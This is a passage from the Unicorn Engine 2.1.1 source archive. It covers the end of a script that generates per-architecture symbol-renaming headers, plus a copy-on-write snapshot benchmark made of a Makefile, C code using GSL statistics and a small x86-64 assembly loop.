helper_msa_maxi_s_df \ helper_msa_maxi_u_df \ helper_msa_mini_s_df \ helper_msa_mini_u_df \ helper_msa_ldi_df \ helper_msa_slli_df \ helper_msa_srai_df \ helper_msa_srli_df \ helper_msa_bclri_df \ helper_msa_bseti_df \ helper_msa_bnegi_df \ helper_msa_sat_s_df \ helper_msa_sat_u_df \ helper_msa_srari_df \ helper_msa_srlri_df \ helper_msa_binsli_df \ helper_msa_binsri_df \ helper_msa_subv_df \ helper_msa_subs_s_df \ helper_msa_subs_u_df \ helper_msa_subsus_u_df \ 
helper_msa_subsuu_s_df \ helper_msa_mulv_df \ helper_msa_dotp_s_df \ helper_msa_dotp_u_df \ helper_msa_mul_q_df \ helper_msa_mulr_q_df \ helper_msa_sld_df \ helper_msa_maddv_df \ helper_msa_msubv_df \ helper_msa_dpadd_s_df \ helper_msa_dpadd_u_df \ helper_msa_dpsub_s_df \ helper_msa_dpsub_u_df \ helper_msa_binsl_df \ helper_msa_binsr_df \ helper_msa_madd_q_df \ helper_msa_msub_q_df \ helper_msa_maddr_q_df \ helper_msa_msubr_q_df \ helper_msa_splat_df \ helper_msa_vshf_df \ helper_msa_sldi_df \ helper_msa_splati_df \ helper_msa_copy_s_b \ helper_msa_copy_s_h \ helper_msa_copy_s_w \ helper_msa_copy_s_d \ helper_msa_copy_u_b \ helper_msa_copy_u_h \ helper_msa_copy_u_w \ helper_msa_insert_b \ helper_msa_insert_h \ helper_msa_insert_w \ helper_msa_insert_d \ helper_msa_insve_df \ helper_msa_ctcmsa \ helper_msa_cfcmsa \ helper_msa_fill_df \ helper_msa_fcaf_df \ helper_msa_fcun_df \ helper_msa_fceq_df \ helper_msa_fcueq_df \ helper_msa_fclt_df \ helper_msa_fcult_df \ helper_msa_fcle_df \ helper_msa_fcule_df \ helper_msa_fsaf_df \ helper_msa_fsun_df \ helper_msa_fseq_df \ helper_msa_fsueq_df \ helper_msa_fslt_df \ helper_msa_fsult_df \ helper_msa_fsle_df \ helper_msa_fsule_df \ helper_msa_fcor_df \ helper_msa_fcune_df \ helper_msa_fcne_df \ helper_msa_fsor_df \ helper_msa_fsune_df \ helper_msa_fsne_df \ helper_msa_fadd_df \ helper_msa_fsub_df \ helper_msa_fmul_df \ helper_msa_fdiv_df \ helper_msa_fmadd_df \ helper_msa_fmsub_df \ helper_msa_fexp2_df \ helper_msa_fexdo_df \ helper_msa_ftq_df \ helper_msa_fmin_df \ helper_msa_fmin_a_df \ helper_msa_fmax_df \ helper_msa_fmax_a_df \ helper_msa_fclass_df \ helper_msa_ftrunc_s_df \ helper_msa_ftrunc_u_df \ helper_msa_fsqrt_df \ helper_msa_frsqrt_df \ helper_msa_frcp_df \ helper_msa_frint_df \ helper_msa_flog2_df \ helper_msa_fexupl_df \ helper_msa_fexupr_df \ helper_msa_ffql_df \ helper_msa_ffqr_df \ helper_msa_ftint_s_df \ helper_msa_ftint_u_df \ helper_msa_ffint_s_df \ helper_msa_ffint_u_df \ helper_raise_exception_err \ helper_raise_exception \ helper_raise_exception_debug \ helper_muls \ helper_mulsu \ helper_macc \ helper_macchi \ helper_maccu \ helper_macchiu \ helper_msac \ helper_msachi \ helper_msacu \ helper_msachiu \ helper_mulhi \ helper_mulhiu \ helper_mulshi \ helper_mulshiu \ helper_dbitswap \ helper_bitswap \ helper_rotx \ helper_ll \ helper_lld \ helper_swl \ helper_swr \ helper_sdl \ helper_sdr \ helper_lwm \ helper_swm \ helper_ldm \ helper_sdm \ helper_fork \ helper_yield \ r4k_helper_tlbinv \ r4k_helper_tlbinvf \ r4k_helper_tlbwi \ r4k_helper_tlbwr \ r4k_helper_tlbp \ r4k_helper_tlbr \ helper_tlbwi \ helper_tlbwr \ helper_tlbp \ helper_tlbr \ helper_tlbinv \ helper_tlbinvf \ helper_ginvt \ helper_di \ helper_ei \ helper_eret \ helper_eretnc \ helper_deret \ helper_rdhwr_cpunum \ helper_rdhwr_synci_step \ helper_rdhwr_cc \ helper_rdhwr_ccres \ helper_rdhwr_performance \ helper_rdhwr_xnp \ helper_pmon \ helper_wait \ mips_cpu_do_unaligned_access \ mips_cpu_do_transaction_failed \ helper_msa_ld_b \ helper_msa_ld_h \ helper_msa_ld_w \ helper_msa_ld_d \ helper_msa_st_b \ helper_msa_st_h \ helper_msa_st_w \ helper_msa_st_d \ helper_cache \ gen_intermediate_code \ mips_tcg_init \ cpu_mips_realize_env \ cpu_state_reset \ restore_state_to_opc \ ieee_rm \ mips_defs \ mips_defs_number \ gen_helper_float_class_s \ gen_helper_float_class_d \ " mipsel_SYMBOLS=${mips_SYMBOLS} mips64_SYMBOLS=${mips_SYMBOLS} mips64el_SYMBOLS=${mips_SYMBOLS} sparc_SYMBOLS=" helper_compute_psr \ helper_compute_C_icc \ cpu_sparc_set_id \ cpu_sparc_init \ 
helper_check_ieee_exceptions \ helper_fadds \ helper_faddd \ helper_faddq \ helper_fsubs \ helper_fsubd \ helper_fsubq \ helper_fmuls \ helper_fmuld \ helper_fmulq \ helper_fdivs \ helper_fdivd \ helper_fdivq \ helper_fsmuld \ helper_fsmulq \ helper_fdmulq \ helper_fnegs \ helper_fnegd \ helper_fnegq \ helper_fitos \ helper_fitod \ helper_fitoq \ helper_fxtos \ helper_fxtod \ helper_fxtoq \ helper_fdtos \ helper_fstod \ helper_fqtos \ helper_fstoq \ helper_fqtod \ helper_fdtoq \ helper_fstoi \ helper_fdtoi \ helper_fqtoi \ helper_fstox \ helper_fdtox \ helper_fqtox \ helper_fabss \ helper_fabsd \ helper_fabsq \ helper_fsqrts \ helper_fsqrtd \ helper_fsqrtq \ helper_fcmps \ helper_fcmpd \ helper_fcmpes \ helper_fcmped \ helper_fcmpq \ helper_fcmpeq \ helper_fcmps_fcc1 \ helper_fcmpd_fcc1 \ helper_fcmpq_fcc1 \ helper_fcmps_fcc2 \ helper_fcmpd_fcc2 \ helper_fcmpq_fcc2 \ helper_fcmps_fcc3 \ helper_fcmpd_fcc3 \ helper_fcmpq_fcc3 \ helper_fcmpes_fcc1 \ helper_fcmped_fcc1 \ helper_fcmpeq_fcc1 \ helper_fcmpes_fcc2 \ helper_fcmped_fcc2 \ helper_fcmpeq_fcc2 \ helper_fcmpes_fcc3 \ helper_fcmped_fcc3 \ helper_fcmpeq_fcc3 \ helper_ldfsr \ helper_ldxfsr \ cpu_raise_exception_ra \ helper_raise_exception \ helper_debug \ helper_tick_set_count \ helper_tick_get_count \ helper_tick_set_limit \ helper_udiv \ helper_udiv_cc \ helper_sdiv \ helper_sdiv_cc \ helper_sdivx \ helper_udivx \ helper_taddcctv \ helper_tsubcctv \ helper_power_down \ sparc_cpu_do_interrupt \ leon3_irq_manager \ sparc_cpu_do_interrupt \ cpu_tsptr \ helper_set_softint \ helper_clear_softint \ helper_write_softint \ helper_check_align \ helper_ld_asi \ helper_st_asi \ sparc_cpu_do_transaction_failed \ sparc_cpu_do_unaligned_access \ sparc_cpu_tlb_fill \ mmu_probe \ sparc_cpu_memory_rw_debug \ cpu_get_phys_page_nofault \ sparc_cpu_get_phys_page_debug \ gen_intermediate_code \ sparc_tcg_init \ restore_state_to_opc \ cpu_set_cwp \ cpu_get_psr \ cpu_put_psr_raw \ cpu_put_psr \ cpu_cwp_inc \ cpu_cwp_dec \ helper_rett \ helper_save \ helper_restore \ helper_flushw \ helper_saved \ helper_restored \ helper_wrpsr \ helper_rdpsr \ cpu_get_ccr \ cpu_put_ccr \ cpu_get_cwp64 \ cpu_put_cwp64 \ helper_rdccr \ helper_wrccr \ helper_rdcwp \ helper_wrcwp \ cpu_gl_switch_gregs \ helper_wrgl \ cpu_change_pstate \ helper_wrpstate \ helper_wrpil \ helper_done \ helper_retry \ " sparc64_SYMBOLS=${sparc_SYMBOLS} m68k_SYMBOLS=" cpu_m68k_init \ helper_reds32 \ helper_redf32 \ helper_exts32 \ helper_extf32 \ helper_extf64 \ helper_redf64 \ helper_firound \ cpu_m68k_set_fpcr \ helper_fitrunc \ helper_set_fpcr \ helper_fsround \ helper_fdround \ helper_fsqrt \ helper_fssqrt \ helper_fdsqrt \ helper_fabs \ helper_fsabs \ helper_fdabs \ helper_fneg \ helper_fsneg \ helper_fdneg \ helper_fadd \ helper_fsadd \ helper_fdadd \ helper_fsub \ helper_fssub \ helper_fdsub \ helper_fmul \ helper_fsmul \ helper_fdmul \ helper_fsglmul \ helper_fdiv \ helper_fsdiv \ helper_fddiv \ helper_fsgldiv \ helper_fcmp \ helper_ftst \ helper_fconst \ helper_fmovemx_st_predec \ helper_fmovemx_st_postinc \ helper_fmovemx_ld_postinc \ helper_fmovemd_st_predec \ helper_fmovemd_st_postinc \ helper_fmovemd_ld_postinc \ helper_fmod \ helper_frem \ helper_fgetexp \ helper_fgetman \ helper_fscale \ helper_flognp1 \ helper_flogn \ helper_flog10 \ helper_flog2 \ helper_fetox \ helper_ftwotox \ helper_ftentox \ helper_ftan \ helper_fsin \ helper_fcos \ helper_fsincos \ helper_fatan \ helper_fasin \ helper_facos \ helper_fatanh \ helper_ftanh \ helper_fsinh \ helper_fcosh \ helper_cf_movec_to \ 
helper_m68k_movec_to \ helper_m68k_movec_from \ helper_set_macsr \ m68k_switch_sp \ m68k_cpu_get_phys_page_debug \ m68k_set_irq_level \ m68k_cpu_tlb_fill \ helper_bitrev \ helper_ff1 \ helper_sats \ cpu_m68k_set_sr \ helper_set_sr \ helper_mac_move \ helper_macmuls \ helper_macmulu \ helper_macmulf \ helper_macsats \ helper_macsatu \ helper_macsatf \ helper_mac_set_flags \ cpu_m68k_get_ccr \ helper_get_ccr \ cpu_m68k_set_ccr \ helper_set_ccr \ helper_flush_flags \ helper_get_macf \ helper_get_macs \ helper_get_macu \ helper_get_mac_extf \ helper_get_mac_exti \ helper_set_mac_extf \ helper_set_mac_exts \ helper_set_mac_extu \ helper_ptest \ helper_pflush \ helper_reset \ m68k_cpu_do_interrupt \ m68k_cpu_transaction_failed \ m68k_cpu_exec_interrupt \ helper_raise_exception \ helper_divuw \ helper_divsw \ helper_divul \ helper_divsl \ helper_divull \ helper_divsll \ helper_cas2w \ helper_cas2l \ helper_cas2l_parallel \ helper_bfexts_mem \ helper_bfextu_mem \ helper_bfins_mem \ helper_bfchg_mem \ helper_bfclr_mem \ helper_bfset_mem \ helper_bfffo_reg \ helper_bfffo_mem \ helper_chk \ helper_chk2 \ floatx80_mod \ floatx80_getman \ floatx80_getexp \ floatx80_scale \ floatx80_move \ floatx80_lognp1 \ floatx80_logn \ floatx80_log10 \ floatx80_log2 \ floatx80_etox \ floatx80_twotox \ floatx80_tentox \ floatx80_tan \ floatx80_sin \ floatx80_cos \ floatx80_atan \ floatx80_asin \ floatx80_acos \ floatx80_atanh \ floatx80_etoxm1 \ floatx80_tanh \ floatx80_sinh \ floatx80_cosh \ m68k_tcg_init \ register_m68k_insns \ gen_intermediate_code \ restore_state_to_opc \ " ppc_SYMBOLS=" ppc_cpu_unrealize \ ppc_cpu_instance_finalize \ ppc_cpu_do_interrupt \ ppc_cpu_do_system_reset \ ppc_cpu_do_fwnmi_machine_check \ ppc_cpu_exec_interrupt \ raise_exception_err_ra \ raise_exception_err \ raise_exception \ raise_exception_ra \ helper_raise_exception_err \ helper_store_msr \ helper_rfi \ helper_40x_rfci \ helper_rfdi \ helper_rfci \ helper_rfmci \ helper_tw \ helper_rfsvc \ helper_msgclr \ helper_msgsnd \ helper_book3s_msgclr \ ppc_cpu_do_unaligned_access \ helper_divweu \ helper_divwe \ helper_sraw \ helper_popcntb \ helper_div \ helper_divo \ helper_divs \ helper_divso \ helper_602_mfrom \ helper_mtvscr \ helper_vaddcuw \ helper_vprtybw \ helper_vprtybd \ helper_vprtybq \ helper_vmuluwm \ helper_vaddfp \ helper_vsubfp \ helper_vminfp \ helper_vmaxfp \ helper_vmaddfp \ helper_vnmsubfp \ helper_vaddsbs \ helper_vsubsbs \ helper_vsubshs \ helper_vaddsws \ helper_vsubsws \ helper_vaddubs \ helper_vsububs \ helper_vadduhs \ helper_vsubuhs \ helper_vadduws \ helper_vsubuws \ helper_vavgsb \ helper_vavgub \ helper_vavgsh \ helper_vavguh \ helper_vavgsw \ helper_vabsdub \ helper_vabsduh \ helper_vabsduw \ helper_vcfux \ helper_vcfsx \ helper_vcmpequb \ helper_vcmpequb_dot \ helper_vcmpequw \ helper_vcmpequw_dot \ helper_vcmpequd \ helper_vcmpequd_dot \ helper_vcmpgtub \ helper_vcmpgtub_dot \ helper_vcmpgtuh \ helper_vcmpgtuh_dot \ helper_vcmpgtuw \ helper_vcmpgtuw_dot \ helper_vcmpgtud \ helper_vcmpgtud_dot \ helper_vcmpgtud \ helper_vcmpgtud_dot \ helper_vcmpgtsb \ helper_vcmpgtsb_dot \ helper_vcmpgtsh \ helper_vcmpgtsh_dot \ helper_vcmpgtsw \ helper_vcmpgtsw_dot \ helper_vcmpgtsd \ helper_vcmpgtsd_dot \ helper_vcmpnezb \ helper_vcmpnezb_dot \ helper_vcmpnezb \ helper_vcmpnezb_dot \ helper_vcmpnezw \ helper_vcmpnezw_dot \ helper_vcmpneb \ helper_vcmpneb_dot \ helper_vcmpneb \ helper_vcmpneb_dot \ helper_vcmpneh \ helper_vcmpneh_dot \ helper_vcmpnew \ helper_vcmpnew_dot \ helper_vcmpeqfp \ helper_vcmpeqfp_dot \ 
helper_vcmpgefp \ helper_vcmpgefp_dot \ helper_vcmpgtfp \ helper_vcmpgtfp_dot \ helper_vcmpbfp \ helper_vcmpbfp_dot \ helper_vcmpbfp \ helper_vcmpbfp_dot \ helper_vctuxs \ helper_vctsxs \ helper_vclzlsbb \ helper_vctzlsbb \ helper_vmhaddshs \ helper_vmhraddshs \ helper_vmladduhm \ helper_vmhraddshs \ helper_vmladduhm \ helper_vmrglb \ helper_vmrghb \ helper_vmrglh \ helper_vmrghh \ helper_vmrglw \ helper_vmrghw \ helper_vmsummbm \ helper_vmsumshs \ helper_vmsumubm \ helper_vmsumuhm \ helper_vmulesb \ helper_vmulosb \ helper_vmulesh \ helper_vmulesw \ helper_vmuleub \ helper_vmuloub \ helper_vmuleuh \ helper_vmulouh \ helper_vmuleuw \ helper_vmulouw \ helper_vperm \ helper_vpermr \ helper_vbpermd \ helper_vpmsumb \ helper_vpmsumh \ helper_vpmsumw \ helper_vpmsumd \ helper_vpkpx \ helper_vpkshss \ helper_vpkshus \ helper_vpkswss \ helper_vpkswus \ helper_vpksdss \ helper_vpksdus \ helper_vpkuhus \ helper_vpkuwus \ helper_vpkudus \ helper_vpkuhum \ helper_vpkuwum \ helper_vpkudum \ helper_vrefp \ helper_vrfin \ helper_vrfim \ helper_vrfip \ helper_vrfiz \ helper_vrlb \ helper_vrlh \ helper_vrlw \ helper_vrld \ helper_vrsqrtefp \ helper_vrldmi \ helper_vrlwmi \ helper_vrldnm \ helper_vrlwnm \ helper_vsel \ helper_vexptefp \ helper_vlogefp \ helper_vextublx \ helper_vextuhlx \ helper_vextuwlx \ helper_vextubrx \ helper_vextuhrx \ helper_vextuwrx \ helper_vslv \ helper_vsrv \ helper_vsldoi \ helper_vslo \ helper_vinsertb \ helper_vinserth \ helper_vinsertw \ helper_vinsertd \ helper_vextractub \ helper_vextractuh \ helper_vextractuw \ helper_vextractd \ helper_xxextractuw \ helper_xxinsertw \ helper_vextsb2w \ helper_vextsb2d \ helper_vextsh2w \ helper_vextsh2d \ helper_vnegw \ helper_vnegd \ helper_vsro \ helper_vsubcuw \ helper_vsumsws \ helper_vsum2sws \ helper_vsum4sbs \ helper_vsum4shs \ helper_vsum4ubs \ helper_vupklpx \ helper_vupkhpx \ helper_vupkhsb \ helper_vupkhsh \ helper_vupkhsw \ helper_vupklsb \ helper_vupklsh \ helper_vupklsw \ helper_vclzb \ helper_vclzh \ helper_vctzb \ helper_vctzh \ helper_vctzw \ helper_vctzd \ helper_vpopcntb \ helper_vpopcnth \ helper_vpopcntw \ helper_vpopcntd \ helper_vadduqm \ helper_vaddeuqm \ helper_vaddcuq \ helper_vaddecuq \ helper_vsubuqm \ helper_vsubeuqm \ helper_vsubcuq \ helper_vsubecuq \ helper_bcdadd \ helper_bcdsub \ helper_bcdcfn \ helper_bcdctn \ helper_bcdcfz \ helper_bcdctz \ helper_bcdcfsq \ helper_bcdctsq \ helper_bcdcpsgn \ helper_bcdsetsgn \ helper_bcds \ helper_bcdus \ helper_bcdsr \ helper_bcdtrunc \ helper_bcdutrunc \ helper_vsbox \ helper_vcipher \ helper_vcipherlast \ helper_vncipher \ helper_vncipherlast \ helper_vshasigmaw \ helper_vshasigmad \ helper_vpermxor \ helper_brinc \ helper_cntlsw32 \ helper_cntlzw32 \ helper_dlmzb \ helper_lmw \ helper_lsw \ helper_lswx \ helper_stsw \ helper_dcbz \ helper_dcbzep \ helper_icbi \ helper_icbiep \ helper_lscbx \ helper_lvebx \ helper_lvehx \ helper_lvewx \ helper_stvebx \ helper_stvehx \ helper_stvewx \ helper_tbegin \ helper_load_dump_spr \ helper_store_dump_spr \ helper_hfscr_facility_check \ helper_fscr_facility_check \ helper_msr_facility_check \ helper_store_sdr1 \ helper_store_pidr \ helper_store_lpidr \ helper_store_hid0_601 \ helper_store_403_pbr \ helper_store_40x_dbcr0 \ helper_store_40x_sler \ helper_clcs \ ppc_store_msr \ helper_fixup_thrm \ store_40x_sler \ dump_mmu \ ppc_cpu_get_phys_page_debug \ helper_store_ibatu \ helper_store_ibatl \ helper_store_dbatu \ helper_store_dbatl \ helper_store_601_batu \ helper_store_601_batl \ ppc_tlb_invalidate_all \ 
ppc_tlb_invalidate_one \ ppc_store_sdr1 \ helper_load_sr \ helper_store_sr \ helper_tlbia \ helper_tlbie \ helper_tlbiva \ helper_6xx_tlbd \ helper_6xx_tlbi \ helper_74xx_tlbd \ helper_74xx_tlbi \ helper_rac \ helper_4xx_tlbre_hi \ helper_4xx_tlbre_lo \ helper_4xx_tlbwe_hi \ helper_4xx_tlbwe_lo \ helper_4xx_tlbsx \ helper_440_tlbwe \ helper_440_tlbre \ helper_440_tlbsx \ helper_booke_setpid \ helper_booke_set_eplc \ helper_booke_set_epsc \ helper_booke206_tlbwe \ helper_booke206_tlbre \ helper_booke206_tlbsx \ helper_booke206_tlbivax \ helper_booke206_tlbilx0 \ helper_booke206_tlbilx1 \ helper_booke206_tlbilx3 \ helper_booke206_tlbflush \ helper_check_tlb_flush_local \ helper_check_tlb_flush_global \ ppc_cpu_tlb_fill \ helper_load_tbl \ helper_load_tbu \ helper_load_atbl \ helper_load_atbu \ helper_load_vtb \ helper_load_601_rtcl \ helper_load_601_rtcu \ helper_store_tbl \ helper_store_tbu \ helper_store_atbl \ helper_store_atbu \ helper_store_601_rtcl \ helper_store_601_rtcu \ helper_load_decr \ helper_store_decr \ helper_load_hdecr \ helper_store_hdecr \ helper_store_vtb \ helper_store_tbu40 \ helper_load_40x_pit \ helper_store_40x_pit \ helper_store_booke_tcr \ helper_store_booke_tsr \ helper_load_dcr \ helper_store_dcr \ helper_raise_exception \ helper_book3s_msgsnd \ helper_cmpb \ helper_mfvscr \ helper_vaddshs \ helper_vavguw \ helper_vcmpequh \ helper_vcmpequh_dot \ helper_vcmpnezh \ helper_vcmpnezh_dot \ helper_vmsumshm \ helper_vmsumuhs \ helper_vmulosh \ helper_vmulosw \ helper_vbpermq \ helper_vextsw2d \ helper_stmw \ ppc_translate_init \ cpu_ppc_init \ gen_intermediate_code \ restore_state_to_opc \ ppc_set_irq \ ppc6xx_irq_init \ ppc40x_core_reset \ ppc40x_chip_reset \ ppc40x_system_reset \ store_40x_dbcr0 \ ppc40x_irq_init \ ppce500_irq_init \ ppce500_set_mpic_proxy \ cpu_ppc_get_tb \ cpu_ppc_load_tbl \ cpu_ppc_load_tbu \ cpu_ppc_store_tbl \ cpu_ppc_store_tbu \ cpu_ppc_load_atbl \ cpu_ppc_load_atbu \ cpu_ppc_store_atbl \ cpu_ppc_store_atbu \ cpu_ppc_load_vtb \ cpu_ppc_store_vtb \ cpu_ppc_store_tbu40 \ ppc_decr_clear_on_delivery \ cpu_ppc_load_decr \ cpu_ppc_load_hdecr \ cpu_ppc_load_purr \ cpu_ppc_store_decr \ cpu_ppc_store_hdecr \ cpu_ppc_store_purr \ cpu_ppc_tb_init \ cpu_ppc601_load_rtcu \ cpu_ppc601_store_rtcu \ cpu_ppc601_load_rtcl \ cpu_ppc601_store_rtcl \ load_40x_pit \ store_40x_pit \ ppc_40x_timers_init \ ppc_dcr_read \ ppc_dcr_write \ ppc_dcr_register \ ppc_dcr_init \ ppc_cpu_pir \ ppc_irq_reset \ store_booke_tsr \ get_pteg_offset32 \ ppc_booke_timers_init \ ppc_hash32_handle_mmu_fault \ gen_helper_store_booke_tsr \ gen_helper_store_booke_tcr \ store_booke_tcr \ ppc_hash32_get_phys_page_debug \ " ppc64_SYMBOLS=${ppc_SYMBOLS} s390x_SYMBOLS="helper_uc_s390x_exit \ tcg_s390_tod_updated \ tcg_s390_program_interrupt \ tcg_s390_data_exception \ " tricore_SYMBOLS=" helper_fadd \ helper_fsub \ helper_fmul \ helper_fdiv \ helper_fmadd \ helper_fmsub \ helper_pack \ gen_intermediate_code \ restore_state_to_opc \ helper_uc_tricore_exit \ " ARCHS="x86_64 arm aarch64 riscv32 riscv64 mips mipsel mips64 mips64el sparc sparc64 m68k ppc ppc64 s390x tricore" for arch in $ARCHS; do echo "Generating header for $arch" echo "/* Autogen header for Unicorn Engine - DONOT MODIFY */" > $SOURCE_DIR/qemu/$arch.h echo "#ifndef UNICORN_AUTOGEN_${arch}_H" >> $SOURCE_DIR/qemu/$arch.h echo "#define UNICORN_AUTOGEN_${arch}_H" >> $SOURCE_DIR/qemu/$arch.h echo "#ifndef UNICORN_ARCH_POSTFIX" >> $SOURCE_DIR/qemu/$arch.h echo "#define UNICORN_ARCH_POSTFIX _$arch" >> $SOURCE_DIR/qemu/$arch.h echo "#endif" 
>> $SOURCE_DIR/qemu/$arch.h
    for loop in $COMMON_SYMBOLS; do
        echo "#define $loop ${loop}_${arch}" >> $SOURCE_DIR/qemu/$arch.h
    done
    ARCH_SYMBOLS=$(eval echo '$'"${arch}_SYMBOLS")
    #echo ${ARCH_SYMBOLS}
    for loop in $ARCH_SYMBOLS; do
        echo "#define $loop ${loop}_${arch}" >> $SOURCE_DIR/qemu/$arch.h
    done
    echo "#endif" >> $SOURCE_DIR/qemu/$arch.h
done

unicorn-2.1.1/tests/benchmarks/cow/Makefile

CFLAGS += -Wall -Werror -I../../../include
CFLAGS += -D__USE_MINGW_ANSI_STDIO=1
LDLIBS += -L../../../build -lgsl -lgslcblas -lm -lunicorn

UNAME_S := $(shell uname -s)

LDLIBS += -pthread
ifeq ($(UNAME_S), Linux)
LDLIBS += -lrt
endif

#EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../build/ DYLD_LIBRARY_PATH=../../build/
EXECUTE_VARS = LD_LIBRARY_PATH=../../../build/cmocka/src:../../../build/ DYLD_LIBRARY_PATH=../../../build/

TESTS_SOURCE = $(wildcard *.c)
TESTS = $(TESTS_SOURCE:%.c=%)

.PHONY: all clean test

test: $(TESTS)

all: $(TESTS)

clean:
	rm -f $(TESTS)
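For reference, each per-arch header emitted by the symbols.sh loop above is just a flat list of #define renames. A minimal, abridged sketch of what qemu/riscv32.h comes out as (the real file carries one #define per entry of COMMON_SYMBOLS, which is defined earlier in this script, followed by every entry of the riscv32_SYMBOLS list above):

/* Autogen header for Unicorn Engine - DONOT MODIFY */
#ifndef UNICORN_AUTOGEN_riscv32_H
#define UNICORN_AUTOGEN_riscv32_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _riscv32
#endif
#define riscv_cpu_mmu_index riscv_cpu_mmu_index_riscv32
#define riscv_csrrw riscv_csrrw_riscv32
#define helper_fadd_s helper_fadd_s_riscv32
... (one line per symbol) ...
#endif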
unicorn-2.1.1/tests/benchmarks/cow/benchmark.c000066400000000000000000000126151467524106700213560ustar00rootroot00000000000000
#include <unicorn/unicorn.h> #include <gsl/gsl_rstat.h> #include <stdio.h> #include <stdlib.h> #include <time.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> struct data { gsl_rstat_workspace *rstat_p; struct timespec start; }; void update_stats(gsl_rstat_workspace *rstat_p, struct timespec *start, struct timespec *end) { double dur = (end->tv_sec - start->tv_sec) * 1000.0; dur += (end->tv_nsec - start->tv_nsec) / 1000000.0; gsl_rstat_add(dur, rstat_p); } static uint64_t CODEADDR = 0x1000; static uint64_t DATABASE = 0x40000000; static uint64_t BLOCKSIZE = 0x10000; /*static void callback_mem(uc_engine *uc, uc_mem_type type, uint64_t addr, uint32_t size, uint64_t value, void *data) { printf("callback mem valid: 0x%lX, value: 0x%lX\n", addr, value); }*/ static int callback_mem_prot(uc_engine *uc, uc_mem_type type, uint64_t addr, uint32_t size, int64_t value, void *data) { printf("callback mem prot: 0x%lX, type: %X\n", addr, type); return false; } static void callback_block(uc_engine *uc, uint64_t addr, uint32_t size, void *data) { struct timespec now; struct data *d = data; size_t run; uint64_t rax = 512; uint64_t rbx = DATABASE; uint64_t rsi; long memblock; long offset; clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &now); if (d->rstat_p) { update_stats(d->rstat_p, &d->start, &now); } else { d->rstat_p = gsl_rstat_alloc(); } run = gsl_rstat_n(d->rstat_p); if ((run >> 4) >= 20) { uc_emu_stop(uc); return; } else if (run > 0 && run % 16 == 0) { uc_snapshot(uc); } /* if (run > 0 && run % 16 == 0) { uc_emu_stop(uc); return; }*/ rsi = random(); memblock = random() & 15; offset = random() & (BLOCKSIZE - 1) & (~0xf); // memblock = 0; // offset = 0; if (memblock == 15 && (offset + 0x1000) > BLOCKSIZE) { offset -= 0x1000; } rbx += (memblock * BLOCKSIZE) + offset; printf("write at 0x%lX\n", rbx); printf("[%li] callback block: 0x%lX\n", run, addr); uc_reg_write(uc, UC_X86_REG_RBX, &rbx); uc_reg_write(uc, UC_X86_REG_RAX, &rax); uc_reg_write(uc, UC_X86_REG_RSI, &rsi); clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &d->start); } static void prepare_mapping(uc_engine *uc) { for (size_t i = 0; i < 16; i++) { printf("mem map: 0x%lX\n", DATABASE+i*BLOCKSIZE); uc_mem_map(uc, DATABASE+i*BLOCKSIZE, BLOCKSIZE, UC_PROT_READ|UC_PROT_WRITE); } } static void prepare_code(uc_engine *uc, const char *file, void **addr) { uc_err err; int fd; fd = open(file, O_RDONLY, 0); if (fd == -1) { perror("open"); exit(1); } *addr = mmap(*addr, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0); if (*addr == MAP_FAILED) { perror("mmap"); exit(1); } err = uc_mem_map_ptr(uc, CODEADDR, 0x1000,
UC_PROT_READ|UC_PROT_EXEC, *addr); close(fd); if (err != UC_ERR_OK) { printf("err: %s\n", uc_strerror(err)); exit(1); } printf("mapped %s\n", file); return; } void print_stats(gsl_rstat_workspace *rstat_p) { double mean, variance, largest, smallest, sd, rms, sd_mean, median, skew, kurtosis; size_t n; mean = gsl_rstat_mean(rstat_p); variance = gsl_rstat_variance(rstat_p); largest = gsl_rstat_max(rstat_p); smallest = gsl_rstat_min(rstat_p); median = gsl_rstat_median(rstat_p); sd = gsl_rstat_sd(rstat_p); sd_mean = gsl_rstat_sd_mean(rstat_p); skew = gsl_rstat_skew(rstat_p); rms = gsl_rstat_rms(rstat_p); kurtosis = gsl_rstat_kurtosis(rstat_p); n = gsl_rstat_n(rstat_p); printf ("The sample mean is %g\n", mean); printf ("The estimated variance is %g\n", variance); printf ("The largest value is %g\n", largest); printf ("The smallest value is %g\n", smallest); printf( "The median is %g\n", median); printf( "The standard deviation is %g\n", sd); printf( "The root mean square is %g\n", rms); printf( "The standard devation of the mean is %g\n", sd_mean); printf( "The skew is %g\n", skew); printf( "The kurtosis %g\n", kurtosis); printf( "There are %zu items in the accumulator\n", n); } int main(int argc, char *argv[]) { uc_engine *uc; uc_err err; uc_hook hook_block; uc_hook hook_mem; struct data d; uint64_t rax = 5; uint64_t rbx = DATABASE; void *bin_mmap = NULL; if (argc != 2) { fprintf(stderr, "usage: %s binary\n", argv[0]); return 1; } d.rstat_p = NULL; srandom(time(NULL)); uc_open(UC_ARCH_X86, UC_MODE_64, &uc); prepare_code(uc, argv[1], &bin_mmap); prepare_mapping(uc); err = uc_hook_add(uc, &hook_block, UC_HOOK_BLOCK, &callback_block, &d, CODEADDR, 0x1000); if (err != UC_ERR_OK) { return 1; } uc_hook_add(uc, &hook_mem, UC_HOOK_MEM_INVALID, &callback_mem_prot, NULL, CODEADDR, 0x1000); uc_reg_write(uc, UC_X86_REG_RBX, &rbx); uc_reg_write(uc, UC_X86_REG_RAX, &rax); /* err = uc_hook_add(uc, &hook_mem, UC_HOOK_MEM_VALID, &callback_mem, NULL, DATABASE, 16*BLOCKSIZE); if (err) { printf("err: %s\n", uc_strerror(err)); return 1; }*/ for (int i = 0; i < 1; i++) { err = uc_emu_start(uc, CODEADDR, -1, 0, 0); if (err) { printf("err: %s\n", uc_strerror(err)); return 1; } uc_snapshot(uc); } print_stats(d.rstat_p); return 0; } �������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/benchmarks/cow/binary.S���������������������������������������������������������0000664�0000000�0000000�00000000214�14675241067�0020660�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������USE64 DEFAULT REL SECTION .text loop: xor rcx, rcx write: mov [rbx+rcx*8], rsi inc rcx mov rdi, rax sub rdi, rcx jnz write jmp loop 
